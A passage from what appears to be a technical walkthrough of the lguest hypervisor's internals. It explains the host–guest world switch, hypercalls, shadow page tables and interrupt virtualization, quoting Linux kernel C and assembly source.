Now the guest is running in ring 1. When the guest need to trap to host, it trigger an interrupt by executing ‘int’ instruction. The guest idt is defined as following:

            .text
                    // The first two traps go straight back to the Host
                    IRQ_STUBS 0 1 return_to_host
                    // We'll say nothing, yet, about NMI
                    IRQ_STUB 2 handle_nmi
                    // Other traps also return to the Host
                    IRQ_STUBS 3 31 return_to_host
                    // All interrupts go via their handlers
                    IRQ_STUBS 32 127 deliver_to_host
                    // 'Cept system calls coming from userspace
                    // Are to go to the Guest, never the Host.
                    IRQ_STUB 128 return_to_host
                    IRQ_STUBS 129 255 deliver_to_host



            .macro IRQ_STUB N TARGET
                    .data; .long 1f; .text; 1:
            // Trap eight, ten through fourteen and seventeen
            // Supply an error number.  Else zero.
            .if (\N <> 8) && (\N < 10 || \N > 14) && (\N <> 17)
                    pushl	$0
            .endif
                    pushl	$\N
                    jmp	\TARGET
                    ALIGN
            .endm

            // This macro creates numerous entries
            // Using GAS macros which out-power C's.
            .macro IRQ_STUBS FIRST LAST TARGET
            irq=\FIRST
            .rept \LAST-\FIRST+1
                    IRQ_STUB irq \TARGET
            irq=irq+1
            .endr
            .endm

Some interrupts/exceptions(8, 10-14, 17) has an errorcode, this errorcode will be pushed into the stack by the hardware. In this other case, we need to push 0 to the stack.

Also in order to know the interrupt number we also need push the trap number to stack.

Let’s take a 0x80(128) as an example.

            return_to_host:
                    SWITCH_TO_HOST
                    iret

The core is ‘SWITCH_TO_HOST’. First we push the guest general register into the stack. Notice the stack is now point to ‘lguest_pages’ and the ‘esp’ points to ‘trapnum’.

            #define SWITCH_TO_HOST							\
                    /* We save the Guest state: all registers first			\
                    * Laid out just as "struct lguest_regs" defines */		\
                    pushl	%es;							\
                    pushl	%ds;							\
                    pushl	%fs;							\
                    pushl	%gs;							\
                    pushl	%ebp;							\
                    pushl	%edi;							\
                    pushl	%esi;							\
                    pushl	%edx;							\
                    pushl	%ecx;							\
                    pushl	%ebx;							\
                    pushl	%eax;							\

Load the guest ds

            movl	$(LGUEST_DS), %eax;					\
            movl	%eax, %ds;						\

Get the lguest_pages start address. And then load host cr3. Load host gdt and idt. Chnage esp to host esp. Load tss.

            movl	%esp, %eax;						\
            andl	$(~(1 << PAGE_SHIFT - 1)), %eax;			\
            /* Save our trap number: the switch will obscure it		\
            * (In the Host the Guest regs are not mapped here)		\
            * %ebx holds it safe for deliver_to_host */			\
            movl	LGUEST_PAGES_regs_trapnum(%eax), %ebx;			\
            /* The Host GDT, IDT and stack!					\
            * All these lie safely hidden from the Guest:			\
            * We must return to the Host page tables			\
            * (Hence that was saved in struct lguest_pages) */		\
            movl	LGUEST_PAGES_host_cr3(%eax), %edx;			\
            movl	%edx, %cr3;						\
            /* As before, when we looked back at the Host			\
            * As we left and marked TSS unused				\
            * So must we now for the Guest left behind. */			\
            andb	$0xFD, (LGUEST_PAGES_guest_gdt+GDT_ENTRY_TSS*8+5)(%eax); \
            /* Switch to Host's GDT, IDT. */				\
            lgdt	LGUEST_PAGES_host_gdt_desc(%eax);			\
            lidt	LGUEST_PAGES_host_idt_desc(%eax);			\
            /* Restore the Host's stack where its saved regs lie */		\
            movl	LGUEST_PAGES_host_sp(%eax), %esp;			\
            /* Last the TSS: our Host is returned */			\
            movl	$(GDT_ENTRY_TSS*8), %edx;				\
            ltr	%dx;							\

Finally pop the register when ‘switch_to_guest’ pushes.

            /* Restore now the regs saved right at the first. */		\
            popl	%ebp;							\
            popl	%fs;							\
            popl	%gs;							\
            popl	%ds;							\
            popl	%es

After ‘SWITCH_TO_HOST’, ‘return_to_host’ executes an iret instruction. Finally the switcher will return to the next instruction after ‘lcall’ in ‘run_guest_once’ function. Thus we has done the VM entry and VM exit world switch.

Hypercall

Before we continue, let’s just see how guest communicate with the host using hyper call. Paravirt virtualization relies hypercall to do the sensetive operation. lguest defines following hypercall:

            #define LHCALL_FLUSH_ASYNC	0
            #define LHCALL_LGUEST_INIT	1
            #define LHCALL_SHUTDOWN		2
            #define LHCALL_NEW_PGTABLE	4
            #define LHCALL_FLUSH_TLB	5
            #define LHCALL_LOAD_IDT_ENTRY	6
            #define LHCALL_SET_STACK	7
            #define LHCALL_TS		8
            #define LHCALL_SET_CLOCKEVENT	9
            #define LHCALL_HALT		10
            #define LHCALL_SET_PMD		13
            #define LHCALL_SET_PTE		14
            #define LHCALL_SET_PGD		15
            #define LHCALL_LOAD_TLS		16
            #define LHCALL_LOAD_GDT_ENTRY	18
            #define LHCALL_SEND_INTERRUPTS	19

The guest makes hypercall by calling ‘hcall’.

            static inline unsigned long
            hcall(unsigned long call,
            unsigned long arg1, unsigned long arg2, unsigned long arg3,
            unsigned long arg4)
            {
                    /* "int" is the Intel instruction to trigger a trap. */
                    asm volatile("int $" __stringify(LGUEST_TRAP_ENTRY)
                            /* The call in %eax (aka "a") might be overwritten */
                            : "=a"(call)
                            /* The arguments are in %eax, %ebx, %ecx, %edx & %esi */
                            : "a"(call), "b"(arg1), "c"(arg2), "d"(arg3), "S"(arg4)
                            /* "memory" means this might write somewhere in memory.
                                    * This isn't true for all calls, but it's safe to tell
                                    * gcc that it might happen so it doesn't get clever. */
                            : "memory");
                    return call;
            }

The %eax is the hypercall number, the %ebx、%ecx…is the argument. The int instruction is used to trap to host. After this interrupt, we return to host. Later in ‘lguest_arch_handle_trap’ we get the argument

            case LGUEST_TRAP_ENTRY:
                    /*
                    * Our 'struct hcall_args' maps directly over our regs: we set
                    * up the pointer now to indicate a hypercall is pending.
                    */
                    cpu->hcall = (struct hcall_args *)cpu->regs;

hcall_args defined as following:

            struct hcall_args {
                    /* These map directly onto eax/ebx/ecx/edx/esi in struct lguest_regs */
                    unsigned long arg0, arg1, arg2, arg3, arg4;
            };

In the next round to ‘run_guest’, ‘do_hypercalls’ is called, the ‘do_hcall’ is called.

            int run_guest(struct lg_cpu *cpu, unsigned long __user *user)
            {
            ...
                    /* We stop running once the Guest is dead. */
                    while (!cpu->lg->dead) {
                            unsigned int irq;
                            bool more;

                            /* First we run any hypercalls the Guest wants done. */
                            if (cpu->hcall)
                                    do_hypercalls(cpu);

            ...
            }
            ...
            }

‘do_call’ is a big switch-case to handle the LHCALL_XXX.

Memory virtualization

lguest uses shadow page tables to do the memory virtualization. Shadow paging is used in MMU virtualization, following show the idea.

The key point is that the value loaded to CPU CR3 register is the host physical address(HPA) of shadow page table. When the guest update guest page table, it will traps to lguest to update the shadow page table.

Initialization

The initial shadow page table is initialized in ‘init_guest_pagetable’.

            int init_guest_pagetable(struct lguest *lg)
            {
                    struct lg_cpu *cpu = &lg->cpus[0];
                    int allocated = 0;

                    /* lg (and lg->cpus[]) starts zeroed: this allocates a new pgdir */
                    cpu->cpu_pgd = new_pgdir(cpu, 0, &allocated);
                    if (!allocated)
                            return -ENOMEM;

                    /* We start with a linear mapping until the initialize. */
                    cpu->linear_pages = true;

                    /* Allocate the page tables for the Switcher. */
                    if (!allocate_switcher_mapping(cpu)) {
                            release_all_pagetables(lg);
                            return -ENOMEM;
                    }

                    return 0;
            }

‘new_pgdir’ is used to create a new page directory which means a new shadow page table. ‘cpu->linear_pages’ is set to true here. This is the guest first created case. Unlike the physical machine which start at real mode and the memory access is in real mode. Here the cpu is in protected mode and the memory access is also translated. So we need create a shadow page table even the guest now has no guest page table.

Let’s dive into some details. When the guest start to execute the guest kernel code it starts at 0x1000000(which is the guest kernel start address in build). As the CR3 is set to the new page directory in ‘init_guest_pagetable’ so the first instruction will cause a page fault.

‘demand_page’ will handle this page fault. The initial case(which guest doesn’t create page tables) is quite easy. ‘demand_page’ just need to set up shadow page table.

First find the pte table and the PTE entry in shadow page table. Then set the page in PTE entry.

            gpte = __pte((vaddr & PAGE_MASK) | _PAGE_RW | _PAGE_PRESENT);
            ...
            spte = find_spte(cpu, vaddr, true, pgd_flags(gpgd), pmd_flags(gpmd));
            ...
            set_pte(spte, gpte_to_spte(cpu, pte_wrprotect(gpte), 0));

The core function is ‘gpte_to_spte’ which translate gpte to spte. Here the ‘gpte’ is just from ‘vaddr’.

            static pte_t gpte_to_spte(struct lg_cpu *cpu, pte_t gpte, int write)
            {
                    unsigned long pfn, base, flags;

            ...
            base = (unsigned long)cpu->lg->mem_base / PAGE_SIZE;

                    ...
                    pfn = get_pfn(base + pte_pfn(gpte), write);
                    ...
                    return pfn_pte(pfn, __pgprot(flags));
            }

The guest’s physicall address is the virtual address of lguest, so here ‘base+pte_pfn(gpte)’ is the frame number of virtual address. ‘get_pfn’ first get the page of this virtpfn and then return the host physical address.

            static unsigned long get_pfn(unsigned long virtpfn, int write)
            {
                    struct page *page;

                    /* gup me one page at this address please! */
                    if (get_user_pages_fast(virtpfn << PAGE_SHIFT, 1, write, &page) == 1)
                            return page_to_pfn(page);

                    /* This value indicates failure. */
                    return -1UL;
            }

Finally ‘set_pte’ set the physicall address in shadow PTE entry.

Let’s add a ‘printk’ in ‘demand_page’

We can see when the guest begins to execute the startup_32 code, it will first make a page fault as the shadow page table is not setup.

The dmesg will end after the guest create his own page table. Then ‘cpu->linear_pages’ will set to false. Then the shadow page really shadow the guest page table.

Guest create pagetables

The guest is started at ‘startup_32’. Begin jump to lguest_entry, it will create an ‘initial_page_table’.

            page_pde_offset = (__PAGE_OFFSET >> 20);

                    movl $pa(__brk_base), %edi
                    movl $pa(initial_page_table), %edx
                    movl $PTE_IDENT_ATTR, %eax
            10:
                    leal PDE_IDENT_ATTR(%edi),%ecx		/* Create PDE entry */
                    movl %ecx,(%edx)			/* Store identity PDE entry */
                    movl %ecx,page_pde_offset(%edx)		/* Store kernel PDE entry */
                    addl $4,%edx
                    movl $1024, %ecx
            11:
                    stosl
                    addl $0x1000,%eax
                    loop 11b
                    /*
                    * End condition: we must map up to the end + MAPPING_BEYOND_END.
                    */
                    movl $pa(_end) + MAPPING_BEYOND_END + PTE_IDENT_ATTR, %ebp
                    cmpl %ebp,%eax
                    jb 10b
                    addl $__PAGE_OFFSET, %edi
                    movl %edi, pa(_brk_end)
                    shrl $12, %eax
                    movl %eax, pa(max_pfn_mapped)

                    /* Do early initialization of the fixmap area */
                    movl $pa(initial_pg_fixmap)+PDE_IDENT_ATTR,%eax
                    movl %eax,pa(initial_page_table+0xffc)

Following show the initial_page_table. The kernel code has been mapped to the low address which the pa is identity with the va, this means identity mapping. Also the kernel is mapped to the high kernel address(above 0xc0000000).

Then the following code will jump to lguest_entry.

            #ifdef CONFIG_PARAVIRT
                    /* This is can only trip for a broken bootloader... */
                    cmpw $0x207, pa(boot_params + BP_version)
                    jb default_entry

                    /* Paravirt-compatible boot parameters.  Look to see what architecture
                            we're booting under. */
                    movl pa(boot_params + BP_hardware_subarch), %eax
                    cmpl $num_subarch_entries, %eax
                    jae bad_subarch

                    movl pa(subarch_entries)(,%eax,4), %eax
                    subl $__PAGE_OFFSET, %eax
                    jmp *%eax

In lguest_entry, it first make a LHCALL_LGUEST_INIT hypercall which do some initialization work, in this function the initiazation shadow page table is clear. This is why return to following code it will also trigger a page fault.

            ENTRY(lguest_entry)
                    /*
                    * We make the "initialization" hypercall now to tell the Host where
                    * our lguest_data struct is.
                    */
                    movl $LHCALL_LGUEST_INIT, %eax
                    movl $lguest_data - __PAGE_OFFSET, %ebx
                    int $LGUEST_TRAP_ENTRY

                    /* Now turn our pagetables on; setup by arch/x86/kernel/head_32.S. */
                    movl $LHCALL_NEW_PGTABLE, %eax
                    movl $(initial_page_table - __PAGE_OFFSET), %ebx
                    int $LGUEST_TRAP_ENTRY

                    /* Set up the initial stack so we can run C code. */
                    movl $(init_thread_union+THREAD_SIZE),%esp

                    /* Jumps are relative: we're running __PAGE_OFFSET too low. */
                    jmp lguest_init+__PAGE_OFFSET

This hypercall instructs the host to make a shadow page table which shadows the ‘initial_page_table’ created by the guest. Also the guest’s page table will be changed to this new one. The final jmp will go to the lguest_init which in high virtual address(above 0xc0000000).

Later while the guest creates a new page table and load it to cr3(load_cr3) it will trap to host and create a new shadow page table. When the guest updates the guest page table, it will call the pv_mmu_ops almostly implemented in lguest. These hooks will make a hypercall to update the corresponding shadow page table.

            /* Pagetable management */
            pv_mmu_ops.write_cr3 = lguest_write_cr3;
            pv_mmu_ops.flush_tlb_user = lguest_flush_tlb_user;
            pv_mmu_ops.flush_tlb_single = lguest_flush_tlb_single;
            pv_mmu_ops.flush_tlb_kernel = lguest_flush_tlb_kernel;
            pv_mmu_ops.set_pte = lguest_set_pte;
            pv_mmu_ops.set_pte_at = lguest_set_pte_at;
            pv_mmu_ops.set_pmd = lguest_set_pmd;
            #ifdef CONFIG_X86_PAE
            pv_mmu_ops.set_pte_atomic = lguest_set_pte_atomic;
            pv_mmu_ops.pte_clear = lguest_pte_clear;
            pv_mmu_ops.pmd_clear = lguest_pmd_clear;
            pv_mmu_ops.set_pud = lguest_set_pud;
            #endif
            pv_mmu_ops.read_cr2 = lguest_read_cr2;
            pv_mmu_ops.read_cr3 = lguest_read_cr3;
            pv_mmu_ops.lazy_mode.enter = paravirt_enter_lazy_mmu;
            pv_mmu_ops.lazy_mode.leave = lguest_leave_lazy_mmu_mode;
            pv_mmu_ops.lazy_mode.flush = paravirt_flush_lazy_mmu;
            pv_mmu_ops.pte_update = lguest_pte_update;
            pv_mmu_ops.pte_update_defer = lguest_pte_update;

When the guest has triggered a shadow page fault. The ‘demand_page’ will be called to handle this, following shows the process. We need read the guest ‘gpgd’ and ‘gpte’, if either of both doesn’t exist this means the guest hasn’t setup the guest page table, so demand_page return false and the lguest will inject a page fault interrupt to guest thus the guest will first handle this page fault. If the guest ‘gpgd’ and ‘gpte’ exist this means the fault is caused by the shadow pagetable and ‘demand_page’ find the ‘spte’ and set the ‘spte’ according the ‘gpte’.

            bool demand_page(struct lg_cpu *cpu, unsigned long vaddr, int errcode,
                            unsigned long *iomem)
            {
                    unsigned long gpte_ptr;
                    pte_t gpte;
                    pte_t *spte;
                    pmd_t gpmd;
                    pgd_t gpgd;

                    *iomem = 0;

                    
                    /* First step: get the top-level Guest page table entry. */
                    if (unlikely(cpu->linear_pages)) {
                            ...
                    } else {
                            gpgd = lgread(cpu, gpgd_addr(cpu, vaddr), pgd_t);
                            /* Toplevel not present?  We can't map it in. */
                            if (!(pgd_flags(gpgd) & _PAGE_PRESENT))
                                    return false;

                            /* 
                            * This kills the Guest if it has weird flags or tries to
                            * refer to a "physical" address outside the bounds.
                            */
                            if (!check_gpgd(cpu, gpgd))
                                    return false;
                    }

                    ...
            gpte_ptr = gpte_addr(cpu, gpgd, vaddr);
            
                    if (unlikely(cpu->linear_pages)) {
                            ...
                    } else {
                            /* Read the actual PTE value. */
                            gpte = lgread(cpu, gpte_ptr, pte_t);
                    }

                    /* If this page isn't in the Guest page tables, we can't page it in. */
                    if (!(pte_flags(gpte) & _PAGE_PRESENT))
                            return false;

                    ...

                    /* Add the _PAGE_ACCESSED and (for a write) _PAGE_DIRTY flag */
                    gpte = pte_mkyoung(gpte);
                    if (errcode & 2)
                            gpte = pte_mkdirty(gpte);

                    /* Get the pointer to the shadow PTE entry we're going to set. */
                    spte = find_spte(cpu, vaddr, true, pgd_flags(gpgd), pmd_flags(gpmd));
                    if (!spte)
                            return false;

                    ...
                    if (pte_dirty(gpte))
                            *spte = gpte_to_spte(cpu, gpte, 1);
                    else
                            /*
                            * If this is a read, don't set the "writable" bit in the page
                            * table entry, even if the Guest says it's writable.  That way
                            * we will come back here when a write does actually occur, so
                            * we can update the Guest's _PAGE_DIRTY flag.
                            */
                            set_pte(spte, gpte_to_spte(cpu, pte_wrprotect(gpte), 0));

                    /*
                    * Finally, we write the Guest PTE entry back: we've set the
                    * _PAGE_ACCESSED and maybe the _PAGE_DIRTY flags.
                    */
                    if (likely(!cpu->linear_pages))
                            lgwrite(cpu, gpte_ptr, pte_t, gpte);

                    /*
                    * The fault is fixed, the page table is populated, the mapping
                    * manipulated, the result returned and the code complete.  A small
                    * delay and a trace of alliteration are the only indications the Guest
                    * has that a page fault occurred at all.
                    */
                    return true;
            }

If the ‘demand_page’ handles the page fault correctly it will return true. If not, ‘lguest_arch_handle_trap’ will set ‘lg->lguest_data->cr2’ to the pagefault address and call ‘deliver_trap’ and this function will push an interrupt frame in guest stack so when guest got run in next round it will first handle this page fault.

            void lguest_arch_handle_trap(struct lg_cpu *cpu)
            {
                    unsigned long iomem_addr;

                    switch (cpu->regs->trapnum) {
                    case 13: /* We've intercepted a General Protection Fault. */
                            ...
                            break;
                    case 14: /* We've intercepted a Page Fault. */
                            ...
                            if (demand_page(cpu, cpu->arch.last_pagefault,
                                            cpu->regs->errcode, &iomem_addr))
                                    return;
            ...
                            if (cpu->lg->lguest_data &&
                            put_user(cpu->arch.last_pagefault,
                                    &cpu->lg->lguest_data->cr2))
                                    kill_guest(cpu, "Writing cr2");
                            break;
                    case 7: /* We've intercepted a Device Not Available fault. */
                            ...
            }

                    /* We didn't handle the trap, so it needs to go to the Guest. */
                    if (!deliver_trap(cpu, cpu->regs->trapnum))
                            /*
                            * If the Guest doesn't have a handler (either it hasn't
                            * registered any yet, or it's one of the faults we don't let
                            * it handle), it dies with this cryptic error message.
                            */
                            kill_guest(cpu, "unhandled trap %li at %#lx (%#lx)",
                                    cpu->regs->trapnum, cpu->regs->eip,
                                    cpu->regs->trapnum == 14 ? cpu->arch.last_pagefault
                                    : cpu->regs->errcode);
            }

The interrupt handle will be explored in next section.

Interrupt virtualization

Overview

There are three kinds of interrupts related with the guest. The first is the real hardware interrupts which occur while the guest is running. The second is the interrups generated by the guest’s virtual devices. And the third kinds of interrupts is the traps and faults from the guest.

When the lguest module got installed the ‘init’ funciton will call ‘lguest_arch_host_init’ which will initialization ‘guest_idt_desc’ which in ‘lguest_pages’. ‘default_idt_entries’ is defined in the end of switcher page

            .data
            .global default_idt_entries
            default_idt_entries:
            .text
                    // The first two traps go straight back to the Host
                    IRQ_STUBS 0 1 return_to_host
                    // We'll say nothing, yet, about NMI
                    IRQ_STUB 2 handle_nmi
                    // Other traps also return to the Host
                    IRQ_STUBS 3 31 return_to_host
                    // All interrupts go via their handlers
                    IRQ_STUBS 32 127 deliver_to_host
                    // 'Cept system calls coming from userspace
                    // Are to go to the Guest, never the Host.
                    IRQ_STUB 128 return_to_host
                    IRQ_STUBS 129 255 deliver_to_host

            // The NMI, what a fabulous beast
            // Which swoops in and stops us no matter that
            // We're suspended between heaven and hell,
            // (Or more likely between the Host and Guest)
            // When in it comes!  We are dazed and confused
            // So we do the simplest thing which one can.
            // Though we've pushed the trap number and zero
            // We discard them, return, and hope we live.
            handle_nmi:
                    addl	$8, %esp
                    iret

            // We are done; all that's left is Mastery
            // And "make Mastery" is a journey long
            // Designed to make your fingers itch to code.

            // Here ends the text, the file and poem.
            ENTRY(end_switcher_text)

First we set add the switcher_offset to every entry in ‘default_idt_entries’, this will get the load address of idt entries. Then ‘setup_default_idt_entries’ will set the guest’s default idt entries.

            void __init lguest_arch_host_init(void)
            {
                    int i;

                    ...
                    for (i = 0; i < IDT_ENTRIES; i++)
                            default_idt_entries[i] += switcher_offset();

                    /*
                    * Set up the Switcher's per-cpu areas.
                    *
                    * Each CPU gets two pages of its own within the high-mapped region
                    * (aka. "struct lguest_pages").  Much of this can be initialized now,
                    * but some depends on what Guest we are running (which is set up in
                    * copy_in_guest_info()).
                    */
                    for_each_possible_cpu(i) {
                            /* lguest_pages() returns this CPU's two pages. */
                            struct lguest_pages *pages = lguest_pages(i);
                            /* This is a convenience pointer to make the code neater. */
                            struct lguest_ro_state *state = &pages->state;

                            ...
                            store_idt(&state->host_idt_desc);

                            /*
                            * The descriptors for the Guest's GDT and IDT can be filled
                            * out now, too.  We copy the GDT & IDT into ->guest_gdt and
                            * ->guest_idt before actually running the Guest.
                            */
                            state->guest_idt_desc.size = sizeof(state->guest_idt)-1;
                            state->guest_idt_desc.address = (long)&state->guest_idt;
                            state->guest_gdt_desc.size = sizeof(state->guest_gdt)-1;
                            state->guest_gdt_desc.address = (long)&state->guest_gdt;

                            ...
                            setup_default_gdt_entries(state);
                            /* Most IDT entries are the same for all Guests, too.*/
                            setup_default_idt_entries(state, default_idt_entries);

                            /*
                            * The Host needs to be able to use the LGUEST segments on this
                            * CPU, too, so put them in the Host GDT.
                            */
                            get_cpu_gdt_table(i)[GDT_ENTRY_LGUEST_CS] = FULL_EXEC_SEGMENT;
                            get_cpu_gdt_table(i)[GDT_ENTRY_LGUEST_DS] = FULL_SEGMENT;
                    }
                    ...
            }

The default idt entries is generated by ‘IRQ_STUBS’ and ‘IRQ_SUTB’ macro. The ‘return_to_host’ means this is a trap and ‘the ‘deliver_to_host’ means the interrupt is an external interrupt.

            IRQ_STUBS 0 1 return_to_host
            // We'll say nothing, yet, about NMI
            IRQ_STUB 2 handle_nmi
            // Other traps also return to the Host
            IRQ_STUBS 3 31 return_to_host
            // All interrupts go via their handlers
            IRQ_STUBS 32 127 deliver_to_host
            // 'Cept system calls coming from userspace
            // Are to go to the Guest, never the Host.
            IRQ_STUB 128 return_to_host
            IRQ_STUBS 129 255 deliver_to_host

When the guest kernel set interrupt table for example through ‘set_intr_gate’. The pv ops ‘lguest_write_idt_entry’ will be called which will trigger a ‘LHCALL_LOAD_IDT_ENTRY’ after write idt to guest’s. The lguest will call ‘load_guest_idt_entry’ to handle the hypercall.

            static void set_trap(struct lg_cpu *cpu, struct desc_struct *trap,
                            unsigned int num, u32 lo, u32 hi)
            {
                    u8 type = idt_type(lo, hi);

                    /* We zero-out a not-present entry */
                    if (!idt_present(lo, hi)) {
                            trap->a = trap->b = 0;
                            return;
                    }

                    /* We only support interrupt and trap gates. */
                    if (type != 0xE && type != 0xF)
                            kill_guest(cpu, "bad IDT type %i", type);

                    /*
                    * We only copy the handler address, present bit, privilege level and
                    * type.  The privilege level controls where the trap can be triggered
                    * manually with an "int" instruction.  This is usually GUEST_PL,
                    * except for system calls which userspace can use.
                    */
                    trap->a = ((__KERNEL_CS|GUEST_PL)<<16) | (lo&0x0000FFFF);
                    trap->b = (hi&0xFFFFEF00);
            }


            void load_guest_idt_entry(struct lg_cpu *cpu, unsigned int num, u32 lo, u32 hi)
            {
                    /*
                    * Guest never handles: NMI, doublefault, spurious interrupt or
                    * hypercall.  We ignore when it tries to set them.
                    */
                    if (num == 2 || num == 8 || num == 15 || num == LGUEST_TRAP_ENTRY)
                            return;

                    /*
                    * Mark the IDT as changed: next time the Guest runs we'll know we have
                    * to copy this again.
                    */
                    cpu->changed |= CHANGED_IDT;

                    /* Check that the Guest doesn't try to step outside the bounds. */
                    if (num >= ARRAY_SIZE(cpu->arch.idt))
                            kill_guest(cpu, "Setting idt entry %u", num);
                    else
                            set_trap(cpu, &cpu->arch.idt[num], num, lo, hi);
            }

The guest’s setting of idt is stored in ‘cpu->arch.idt’. ‘load_guest_idt_entry’ will set ‘cpu->changed’ with ‘CHANGED_IDT’ and then call ‘set_trap’. The guest only allow set some interrupt and trap gates.

The ‘run_guest_once’ will call ‘copy_in_guest_info’ which will check ‘cpu->changed’ if it has CHANGED_IDT set it will call ‘copy_traps’. This function will copy the ‘direct trap’ into the ‘pages->state.guest_idt’ from ‘cpu->arch.idt[]’.

            static void copy_in_guest_info 
            {
            ...
            if (cpu->changed & CHANGED_IDT)
                            copy_traps(cpu, pages->state.guest_idt, default_idt_entries);
            ...
            }

            void copy_traps(const struct lg_cpu *cpu, struct desc_struct *idt,
                            const unsigned long *def)
            {
                    unsigned int i;

                    /*
                    * We can simply copy the direct traps, otherwise we use the default
                    * ones in the Switcher: they will return to the Host.
                    */
                    for (i = 0; i < ARRAY_SIZE(cpu->arch.idt); i++) {
                            const struct desc_struct *gidt = &cpu->arch.idt[i];

                            /* If no Guest can ever override this trap, leave it alone. */
                            if (!direct_trap(i))
                                    continue;

                            /*
                            * Only trap gates (type 15) can go direct to the Guest.
                            * Interrupt gates (type 14) disable interrupts as they are
                            * entered, which we never let the Guest do.  Not present
                            * entries (type 0x0) also can't go direct, of course.
                            *
                            * If it can't go direct, we still need to copy the priv. level:
                            * they might want to give userspace access to a software
                            * interrupt.
                            */
                            if (idt_type(gidt->a, gidt->b) == 0xF)
                                    idt[i] = *gidt;
                            else
                                    default_idt_entry(&idt[i], i, def[i], gidt);
                    }
            }

            static bool direct_trap(unsigned int num)
            {
                    /*
                    * Hardware interrupts don't go to the Guest at all (except system
                    * call).
                    */
                    if (num >= FIRST_EXTERNAL_VECTOR && !could_be_syscall(num))
                            return false;

                    /*
                    * The Host needs to see page faults (for shadow paging and to save the
                    * fault address), general protection faults (in/out emulation) and
                    * device not available (TS handling) and of course, the hypercall trap.
                    */
                    return num != 14 && num != 13 && num != 7 && num != LGUEST_TRAP_ENTRY;
            }

After some debug, I find that only the 0x80 (syscall trap) can be set by guest.

When host switch to guest(switch_to_guest), lidt will load the lguest_pages idt desc which point to the lguest_pages’s state.guest_idt.

            lidt	LGUEST_PAGES_guest_idt_desc(%eax)

External interrupt

Then the physical CPU receive an interrupt, it will first trap to host and the following handler will be called, mostly ‘deliver_to_host’.

            IRQ_STUBS 32 127 deliver_to_host
            // 'Cept system calls coming from userspace
            // Are to go to the Guest, never the Host.
            IRQ_STUB 128 return_to_host
            IRQ_STUBS 129 255 deliver_to_host

The ‘deliver_to_host’ will first load the host context by calling ‘SWITCH_TO_HOST’. Then find the interrupt handler and jump to there. The stack is ready by interrupt and ‘SWITCH_TO_HOST’ after the handler the iret will go to the right address which runs the host code.

            deliver_to_host:
                    SWITCH_TO_HOST
                    // But now we must go home via that place
                    // Where that interrupt was supposed to go
                    // Had we not been ensconced, running the Guest.
                    // Here we see the trickness of run_guest_once():
                    // The Host stack is formed like an interrupt
                    // With EIP, CS and EFLAGS layered.
                    // Interrupt handlers end with "iret"
                    // And that will take us home at long long last.

                    // But first we must find the handler to call!
                    // The IDT descriptor for the Host
                    // Has two bytes for size, and four for address:
                    // %edx will hold it for us for now.
                    movl	(LGUEST_PAGES_host_idt_desc+2)(%eax), %edx
                    // We now know the table address we need,
                    // And saved the trap's number inside %ebx.
                    // Yet the pointer to the handler is smeared
                    // Across the bits of the table entry.
                    // What oracle can tell us how to extract
                    // From such a convoluted encoding?
                    // I consulted gcc, and it gave
                    // These instructions, which I gladly credit:
                    leal	(%edx,%ebx,8), %eax
                    movzwl	(%eax),%edx
                    movl	4(%eax), %eax
                    xorw	%ax, %ax
                    orl	%eax, %edx
                    // Now the address of the handler's in %edx
                    // We call it now: its "iret" drops us home.
                    jmp	*%edx

Virtual device interrupt

When the lguest userspace tool wants to notify the guest for example receive of packets or console input, it will trigger an interrupt by calling ‘trigger_irq’. This function writes the irq information to /dev/lguest.

            static void trigger_irq(struct virtqueue *vq)
            {
                    unsigned long buf[] = { LHREQ_IRQ, vq->dev->config.irq_line };

                    ...

                    /* Send the Guest an interrupt tell them we used something up. */
                    if (write(lguest_fd, buf, sizeof(buf)) != 0)
                            err(1, "Triggering irq %i", vq->dev->config.irq_line);
            }

The lg module calls ‘user_send_irq’ to handle this req. This function calls ‘set_interrupt’ to set bit in ‘cpu->irqs_pending’ and then wakeups the guest process cpu.

            static ssize_t write(struct file *file, const char __user *in,
                            size_t size, loff_t *off)
            {
                    ...

                    switch (req) {
                    case LHREQ_INITIALIZE:
                            return initialize(file, input);
                    case LHREQ_IRQ:
                            return user_send_irq(cpu, input);
                    case LHREQ_GETREG:
                            return getreg_setup(cpu, input);
                    case LHREQ_SETREG:
                            return setreg(cpu, input);
                    case LHREQ_TRAP:
                            return trap(cpu, input);
                    default:
                            return -EINVAL;
                    }
            }

            void set_interrupt(struct lg_cpu *cpu, unsigned int irq)
            {
                    /*
                    * Next time the Guest runs, the core code will see if it can deliver
                    * this interrupt.
                    */
                    set_bit(irq, cpu->irqs_pending);

                    /*
                    * Make sure it sees it; it might be asleep (eg. halted), or running
                    * the Guest right now, in which case kick_process() will knock it out.
                    */
                    if (!wake_up_process(cpu->tsk))
                            kick_process(cpu->tsk);
            }

The ‘run_guest’ will call ‘interrupt_pending’ to check whether there are pending interrupts and call ‘try_deliver_interrupt’ to handle the interrupts.

	irq = interrupt_pending(cpu, &more);
	if (irq < LGUEST_IRQS)
		try_deliver_interrupt(cpu, irq, more);

Guest trap

If the guest triggers a trap for example, the guest hasn’t setup pagetables for memory access. This will first trap to the host and the ‘return_to_host’ will be called.

            IRQ_STUBS 0 1 return_to_host
            // We'll say nothing, yet, about NMI
            IRQ_STUB 2 handle_nmi
            // Other traps also return to the Host
            IRQ_STUBS 3 31 return_to_host

‘return_to_host’ is just ‘SWITCH_TO_HOST’ and ‘iret’ will return to the point which run guest code in ‘run_guest_once’.

            return_to_host:
                    SWITCH_TO_HOST
                    iret

The SWITCH_TO_HOST will set the ‘cpu->regs->trapnum’. After ‘iret’ we will call ‘lguest_arch_handle_trap’ to handle the guest trap. If the trap is about the guest. The ‘deliver_trap’ will be called to deliver the interrupt to guest.

            int run_guest(struct lg_cpu *cpu, unsigned long __user *user)
            {
                    ...

                    /* We stop running once the Guest is dead. */
                    while (!cpu->lg->dead) {
                            unsigned int irq;
                            bool more;

                            /* First we run any hypercalls the Guest wants done. */
                            if (cpu->hcall)
                                    do_hypercalls(cpu);

                            ...

                            ...
                            irq = interrupt_pending(cpu, &more);
                            if (irq < LGUEST_IRQS)
                                    try_deliver_interrupt(cpu, irq, more);

                            ...
                            local_irq_disable();

                            /* Actually run the Guest until something happens. */
                            lguest_arch_run_guest(cpu);

                            /* Now we're ready to be interrupted or moved to other CPUs */
                            local_irq_enable();

                            /* Now we deal with whatever happened to the Guest. */
                            lguest_arch_handle_trap(cpu);
                    }
                    ...
            }

‘push_guest_interrupt_stack’ push the guest state to guest stack. ‘guest_run_interrupt’ will change the eip to the interrupt handler. When the guest code got run, it will first run the guest interrupt handler code.

